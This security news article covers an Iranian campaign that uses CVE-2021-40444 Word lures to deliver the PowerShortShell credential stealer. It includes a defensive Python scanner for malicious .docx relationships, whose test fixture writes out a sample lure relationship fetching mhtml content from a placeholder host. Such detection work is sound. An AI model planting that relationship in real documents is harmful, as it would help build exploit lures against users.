A new Iranian threat actor was found exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims worldwide using a new PowerShell-based information stealer dubbed PowerShortShell.
The info stealer steals Google and Instagram credentials, performs Telegram surveillance, and collects system information from compromised devices; all of this is sent to attacker-controlled servers together with the stolen credentials.
The attacks were discovered by researchers at SafeBreach Labs; they started in July as spear-phishing emails.
They target Windows users with malicious Winword attachments that exploit a Microsoft MSHTML remote code execution (RCE) bug tracked as CVE-2021-40444.
The PowerShortShell stealer payload is executed by a DLL downloaded on compromised systems. Once launched, the PowerShell script collects data and screen snapshots, exfiltrating it to the attacker’s command-and-control server.
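A defender triaging the malicious Word attachments described above would want a quick static check before any detonation. The following Python script is an added example, not code from SafeBreach Labs or from the article: it unpacks a .docx (a zip container) and flags oleObject relationships that point outside the document, in particular ones whose target uses the mhtml: scheme, which is the relationship shape the public CVE-2021-40444 lure documents used to make Word fetch attacker HTML through MSHTML. The sample documents are constructed in memory; the 203.0.113.10 address is a documentation placeholder, not an indicator from the page.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespaces used inside *.rels parts (not page-specific values).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)


def scan_docx(data: bytes) -> list:
    """Return findings for OLE relationships that point outside the document.

    Every *.rels part in a .docx lists relationships. A TargetMode="External"
    oleObject relationship is unusual in legitimate documents; one whose target
    starts with mhtml: matches the public CVE-2021-40444 lure pattern.
    """
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not an OOXML (zip) container")
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                # A rels part that does not parse is itself worth a look.
                findings.append({"part": part, "id": None, "target": None,
                                 "reason": "unparseable-rels"})
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_OBJECT_TYPE:
                    continue
                if (rel.get("TargetMode") or "").lower() != "external":
                    continue
                target = rel.get("Target", "")
                reason = ("mhtml-external-ole" if target.lower().startswith("mhtml:")
                          else "external-ole")
                findings.append({"part": part, "id": rel.get("Id"),
                                 "target": target, "reason": reason})
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx in memory around the given document.xml.rels (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed rels part mimicking the lure pattern; the host is a placeholder address.
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId7" Type="{OLE_OBJECT_TYPE}"
    Target="mhtml:http://203.0.113.10/word.html" TargetMode="External"/>
</Relationships>"""

# Constructed rels part of an ordinary document: only an internal styles relationship.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
    Target="styles.xml"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("suspicious", SUSPICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_docx(build_sample_docx(rels)))
```

To run it against real mail attachments, pass the file bytes to `scan_docx`; anything with a `mhtml-external-ole` finding should be quarantined and the host checked for the follow-on DLL and PowerShell activity the report describes.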
According to Tomer Bar, Director of Security Research at SafeBreach Labs, almost half of the victims are located in the United States. Based on the Microsoft Word document content (which blames Iran’s leader for the ‘Corona massacre’) and the nature of the collected data, they assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime.
The adversary might be linked to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten.
The CVE-2021-40444 RCE bug impacting IE’s MSHTML rendering engine has been exploited in the wild as a zero-day. Microsoft has released a patch for the flaw.
More and more attackers are using CVE-2021-40444 exploits since threat actors started sharing tutorials and proof-of-concept exploits on hacking forums even before the bug was patched.
This allowed other threat actors and groups to start exploiting the security flaw in their own attacks.